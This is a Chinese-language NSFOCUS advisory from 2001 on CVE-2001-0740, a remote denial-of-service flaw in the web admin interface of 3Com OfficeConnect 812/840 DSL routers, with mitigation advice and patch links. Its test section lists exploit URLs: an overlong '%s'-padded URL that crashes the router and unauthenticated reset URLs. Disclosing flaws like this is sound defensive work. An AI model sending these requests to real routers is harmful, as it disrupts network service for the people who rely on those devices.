首页 -> 安全研究

安全研究

安全漏洞
3Com OfficeConnect Router Web管理接口远程拒绝服务攻击漏洞

发布日期:2001-05-18
更新日期:2001-05-18

受影响系统:
3Com OfficeConnect DSL Router 812 1.1.7
3Com OfficeConnect DSL Router 840 1.1.7
不受影响系统:
3Com OfficeConnect DSL Router 812 1.1.9
3Com OfficeConnect DSL Router 840 1.1.9
描述:
BUGTRAQ  ID: 2721
CVE(CAN) ID: CVE-2001-0740

3Com OfficeConnect router是由3Com开发的一个路由器系列。

3COM OfficeConnect 812和3Com OfficeConnect Remote 840 SDSL的Web管理接口存在远程拒绝服务问题。

3COM OfficeConnect 812路由器的80端口运行的是HTTP服务器。用浏览器连上该端口后它会提示输入用户名和密码,在输入错误的用户名/密码之后会出现一个页面提示你这是一个受保护的对象。页面中有一个GIF图片,在该图片的URL的后面追加很多字符从而构造一个超长的URL并发送给路由器的80端口将使该路由器崩溃,在数分钟内又自动恢复正常。而且该路由器允许攻击者可以在不需要密码的情况下复位路由器。3Com OfficeConnect Remote 840 SDSL路由器也存在类似的缓冲区溢出,但无法自动恢复。

<*来源:inc (ix_lsd@hotmail.com
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

inc (ix_lsd@hotmail.com)提供了如下测试方法:

1、发送如下超长的URL使路由器崩溃:
http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
2、复位路由器:
http://192.168.1.254/adsl_pair_select
http://192.168.1.254/adsl_reset

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 只允许受信任的网络访问路由器的23和80端口。

厂商补丁:

3Com
----
目前厂商已经发布了升级补丁以修复这个安全问题:

3com OfficeConnect DSL Router 812 1.1.7:
3Com Upgrade OfficeConnect 812 & 840 1.1.9.4
ftp://ftp.3com.com/pub/officeconnect/ocradsl/bld_1_1_9_4.zip
3com OfficeConnect DSL Router 840 1.1.7:
3Com Upgrade OfficeConnect 812 & 840 1.1.9.4
ftp://ftp.3com.com/pub/officeconnect/ocradsl/bld_1_1_9_4.zip

浏览次数:3525
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障